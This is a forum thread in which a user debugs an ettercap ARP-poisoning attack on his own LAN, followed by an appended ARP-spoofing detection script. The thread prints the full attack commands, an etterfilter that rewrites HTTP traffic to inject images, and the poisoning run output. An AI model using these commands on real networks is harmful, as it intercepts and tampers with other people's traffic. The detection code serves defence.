LinuxQuestions.org


sumeet inani 07-18-2013 08:26 AM

ettercap on fedora 17
 
hi,
please note that I have two computers on a LAN with gateway 192.168.8.1.
So, I am trying out the stuff harmlessly.

I read http://www.irongeek.com/i.php?page=s...ettercapfilter and accordingly tried to change the images visible on a web page on the target computer (Windows XP, 192.168.8.184).

I see that 'filter ran' is echoed several times.
Even if the URL isn't https, the web page still loads slowly and incompletely, without the changed image.
Why did the target web browser 'google chrome Version 30.0.1566.2' drop the images I am trying to insert?

TB0ne 07-18-2013 08:57 AM

Quote:

Originally Posted by sumeet inani (Post 4992543)
hi,
please note that I have two computers on a LAN with gateway 192.168.8.1. So, I am trying out the stuff harmlessly.

...and we have no way of knowing this, or what your intentions are.
Quote:

I read http://www.irongeek.com/i.php?page=s...ettercapfilter and accordingly tried to change the images visible on a web page on the target computer (Windows XP, 192.168.8.184).

I see that 'filter ran' is echoed several times. Even if the URL isn't https, the web page still loads slowly and incompletely, without the changed image.
Why did the target web browser 'google chrome Version 30.0.1566.2' drop the images I am trying to insert?
No idea, since you don't post information about what you did, other than that weblink. Some VERY obvious things:
  • The picture you referenced for the 'filter' doesn't exist/can't be read?
  • You're filtering http, NOT https?
  • You didn't read this part of the page you linked to?
    Quote:

    Originally Posted by Weblink
    Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss


sumeet inani 07-19-2013 05:11 AM

Apropos intentions - I can just say that the ettercap tool is freely available and it is the choice of any individual to believe or not what I say.
If used maliciously, then the consequences have to be borne by the doer - that I am well aware of.

I read that
Quote:

Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss
Still, I was expecting to see the changed image once on any web page (http://ibnlive.in.com/ in my case).

Have you tried it, or do you intend to?
If yes, then you can help me in solving this, because I have followed the mentioned tutorial step by step.


Here is the command I ran
Code:

etterfilter  imag.filter  -o replace.ef
ettercap -T -Q -M arp:remote -i p5p1  /192.168.8.184/ /192.168.8.1/ -P remote_browser -F replace.ef

where imag.filter contained
Code:

############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                            #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or      #
#  (at your option) any later version.                                    #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
  }
}
if (ip.proto == TCP && tcp.src == 80) {
  replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  msg("Filter Ran.\n");
}

I conclude that
the message 'filter ran' indicates that there is no problem of intervening attributes between img & src, which could prevent the pattern match and hence the replacement.
I am not aware if there is some checksum associated which causes the browser to disregard the replaced packets as garbage.

TB0ne 07-19-2013 09:22 AM

Quote:

Originally Posted by sumeet inani (Post 4993103)
Apropos intentions - I can just say that the ettercap tool is freely available and it is the choice of any individual to believe or not what I say. If used maliciously, then the consequences have to be borne by the doer - that I am well aware of.

And we all are aware of that, but the LQ Rules specifically mention hacking/cracking, and the fact that such things aren't to be discussed. I am not saying we don't believe you, but that we have no way of KNOWING your intentions.
Quote:

I read that. Still, I was expecting to see the changed image once on any web page (http://ibnlive.in.com/ in my case). Have you tried it, or do you intend to? If yes, then you can help me in solving this, because I have followed the mentioned tutorial step by step.

Here is the command I ran
Code:

etterfilter  imag.filter  -o replace.ef
ettercap -T -Q -M arp:remote -i p5p1  /192.168.8.184/ /192.168.8.1/ -P remote_browser -F replace.ef

where imag.filter contained
Code:

############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                            #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or      #
#  (at your option) any later version.                                    #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
  }
}
if (ip.proto == TCP && tcp.src == 80) {
  replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
  msg("Filter Ran.\n");
}

I conclude that
the message 'filter ran' indicates that there is no problem of intervening attributes between img & src, which could prevent the pattern match and hence the replacement. I am not aware if there is some checksum associated which causes the browser to disregard the replaced packets as garbage.
Well, if you did follow the tutorial, you'll notice that you're missing the backslashes before the end of the img src lines, as they are in the tutorial. You'll also notice this part of the tutorial as well:
Quote:

Originally Posted by Ettercap Page
Be careful with the above command, having all of the traffic on a large network going through one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.22.47, we would use this command:

ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //

...which specifically addresses the speed issue you mentioned previously, since you're (apparently) specifying a large range of addresses in your command. Also, the command you typed in for your one workstation
Code:

ettercap -T -Q -M arp:remote -i p5p1  /192.168.8.184/ /192.168.8.1/ -P remote_browser -F replace.ef
doesn't match the code that's posted in that tutorial, and uses different options and syntax.

sumeet inani 07-22-2013 01:41 AM

Please pardon my unintended impertinence.
It seems this is not the appropriate place for discussing this stuff.
Anyway, I copied the code verbatim from http://www.irongeek.com/i.php?page=s...ettercapfilter
The browsing on the target computer was slow, though:
Code:

ettercap NG-0.7.4_git copyright 2001-2011 ALoR & NaGA

Content filters loaded from ig.ef...
Listening on p5p1... (Ethernet)

  p5p1 ->        6C:3B:E5:20:B2:AD    192.168.8.103    255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  40 protocol dissectors
  55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.8.184 00:1E:C9:3E:7D:92

 GROUP 2 : 192.168.8.1 1C:E6:C7:52:00:C0
Starting Unified sniffing...

This shows that no other computer on the LAN was targeted.
Still, I see the source code of the target web page mentioning the redirected link at one of two img tags.
The one that did not get replaced had additional attributes on the img tag other than src.
I have written mail to ettercap.project -at- gmail.com seeking documentation on etterfilter rules.
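A defender-side check that follows from the ettercap output above, as an added example that is not part of the original thread: on the poisoned host (192.168.8.184) the poisoning is visible in its own ARP table, because the gateway IP suddenly maps to the MAC of the host running ettercap (192.168.8.103) instead of the real gateway MAC. The script, the `ip neigh`-style snapshots and the pinned gateway entry are constructed for illustration; the IP and MAC addresses are the ones printed by ettercap in the post above.

```python
import re
from collections import defaultdict

# Known-good gateway binding. The value is taken from the ettercap output above
# (GROUP 2 : 192.168.8.1 1C:E6:C7:52:00:C0); in practice it comes from your own
# inventory, never from a tool running on an untrusted host.
PINNED = {"192.168.8.1": "1c:e6:c7:52:00:c0"}

# Two constructed ARP-table snapshots in `ip neigh` output format (not real
# captures). CLEAN is the table on 192.168.8.184 before the attack; POISONED is
# the same table while 192.168.8.103 answers ARP requests for the gateway.
CLEAN = """\
192.168.8.1 dev eth0 lladdr 1c:e6:c7:52:00:c0 REACHABLE
192.168.8.103 dev eth0 lladdr 6c:3b:e5:20:b2:ad STALE
"""
POISONED = """\
192.168.8.1 dev eth0 lladdr 6c:3b:e5:20:b2:ad REACHABLE
192.168.8.103 dev eth0 lladdr 6c:3b:e5:20:b2:ad REACHABLE
"""

# Matches resolved entries only; FAILED/INCOMPLETE lines carry no lladdr.
ENTRY = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17}) (\S+)$")


def parse_neigh(text):
    """Return {ip: mac} for every resolved entry in an `ip neigh` dump."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def check_arp(table, pinned=PINNED):
    """Return a list of (kind, detail) findings for one ARP snapshot."""
    findings = []
    # 1. A pinned IP whose MAC changed: the direct sign of gateway poisoning.
    for ip, mac in pinned.items():
        seen = table.get(ip)
        if seen is not None and seen != mac:
            findings.append(("pinned-mismatch", f"{ip} is {seen}, expected {mac}"))
    # 2. One MAC claiming several IPs: the poisoner's MAC now sits behind
    #    both its own address and the address it is impersonating.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate-mac", f"{mac} answers for {sorted(ips)}"))
    return findings


if __name__ == "__main__":
    for name, snap in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, check_arp(parse_neigh(snap)))
```

On a real host, feed it the output of `ip neigh` on a schedule; a static ARP entry for the gateway or port security on the switch is the corresponding mitigation.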

